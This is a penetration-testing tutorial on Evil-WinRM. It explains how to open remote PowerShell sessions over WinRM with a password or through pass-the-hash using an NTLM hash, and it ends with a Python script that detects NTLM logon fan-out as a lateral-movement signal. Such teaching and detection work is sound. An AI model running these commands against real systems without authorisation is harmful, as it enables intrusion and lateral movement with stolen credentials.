Evil-WinRM
This section will cover using Evil-WinRM.
Table of Contents
- Overview
- Using Evil-WinRM
- Pass-the-Hash
Overview
Evil-WinRM can be used to abuse the WinRM protocol to get a remote shell session using the IP address of the target and user credentials.
To install it, we can use the command apt install evil-winrm on Kali Linux.
Windows Remote Management (WinRM) is Microsoft's implementation of the Web Services Management Protocol (WS-Management). It is based on XML web services using the Simple Object Access Protocol (SOAP) and is used for the remote management of Windows systems.
For security reasons, WinRM must be activated and configured manually in Windows 10. Whether it is reachable, and by whom, therefore depends heavily on how the domain or network in which WinRM is used has been configured and secured.
WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default.
Using Evil-WinRM
To use Evil-WinRM, we can use the following command.
evil-winrm -i <Target IP> -u <Username> -p <Password>
Command breakdown:
- -i <Target IP> - Specify the target IP address.
- -u <Username> - Specify the username to use for authentication.
- -p <Password> - Specify the password to use for authentication.
An example will be:
evil-winrm -i 10.42.0.222 -u myuser -p Supers3cret
Command breakdown:
- -i 10.42.0.222 - Specify the target IP address.
- -u myuser - Specify the username to use for authentication.
- -p Supers3cret - Specify the password to use for authentication.
If the login is successful, a terminal session will be initialised using the PowerShell Remoting Protocol (MS-PSRP).
Pass-the-Hash
If we are unable to crack a hash, we can consider using an attack method called Pass-the-Hash (PtH). A PtH attack takes advantage of the NTLM authentication protocol to authenticate a user with the password hash itself, without ever recovering the clear-text password.
This method can be used to move laterally after an initial compromise in a network.
Instead of supplying username:clear-text password for the login, we supply username:password hash to authenticate.
We can use Evil-WinRM to perform this with the following command. Note that we will need to use <username>@<domain> to authenticate with a domain account.
evil-winrm -i <Target IP> -u <username> -H <password hash>
Command breakdown:
- -i <Target IP> - Specify the target IP address.
- -u <username> - Specify the account username to log in as. Optionally, use <username>@<domain> to log in to a domain account.
- -H <password hash> - Specify the password hash.
An example will be:
evil-winrm -i 10.42.20.3 -u administrator -H BCD82943C6AC81E7DFFBD85D253961FA
Or, if attempting to log in to a domain account:
evil-winrm -i 10.42.20.3 -u administrator@acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA
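From the defender's side, the NTLM logons that a PtH session like the ones above produces are the signal to hunt for: in a domain, Kerberos is the normal authentication package, so one account completing NTLM network logons (Security event 4624, logon type 3) from a single source to several hosts in a short window is a common lateral-movement heuristic. The following Python script is an added example, not part of the Evil-WinRM project; the event records, hosts, IP addresses and thresholds are constructed for illustration.

```python
"""Flag NTLM network logons that look like pass-the-hash lateral movement.

The records below are constructed to mimic the fields of Windows Security
event 4624 (LogonType 3 = network logon, AuthenticationPackageName = NTLM).
Hosts, accounts, addresses and thresholds are assumptions for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4624-style records:
# (timestamp, target host, account, source IP, logon type, auth package)
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:05", "FS01", "administrator", "10.42.0.50", 3, "NTLM"),
    ("2024-05-01T10:01:10", "WS07", "administrator", "10.42.0.50", 3, "NTLM"),
    ("2024-05-01T10:02:30", "DC01", "administrator", "10.42.0.50", 3, "NTLM"),
    ("2024-05-01T10:03:00", "FS01", "jsmith", "10.42.0.51", 3, "Kerberos"),
    ("2024-05-01T14:00:00", "FS01", "backupsvc", "10.42.0.9", 3, "NTLM"),
]


def parse_event(rec):
    """Turn one raw tuple into a dict with a parsed timestamp."""
    ts, host, user, src, ltype, pkg = rec
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "src": src, "logon_type": ltype, "auth_pkg": pkg}


def find_ntlm_fanout(events, min_hosts=3, window=timedelta(minutes=10)):
    """Return (user, src_ip, hosts) for every account/source pair that made
    NTLM network logons to at least min_hosts distinct hosts inside window."""
    by_pair = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["auth_pkg"].upper() == "NTLM":
            by_pair[(e["user"], e["src"])].append(e)
    hits = []
    for (user, src), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):  # slide the window over each start event
            hosts = {x["host"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(hosts) >= min_hosts:
                hits.append((user, src, sorted(hosts)))
                break
    return hits


if __name__ == "__main__":
    parsed = [parse_event(r) for r in SAMPLE_EVENTS]
    for user, src, hosts in find_ntlm_fanout(parsed):
        print(f"ALERT: {user} from {src} used NTLM against {len(hosts)} hosts: {', '.join(hosts)}")
```

Tune min_hosts and window to the environment, and allow-list accounts that legitimately authenticate with NTLM (legacy service accounts, non-domain-joined hosts) before acting on the output.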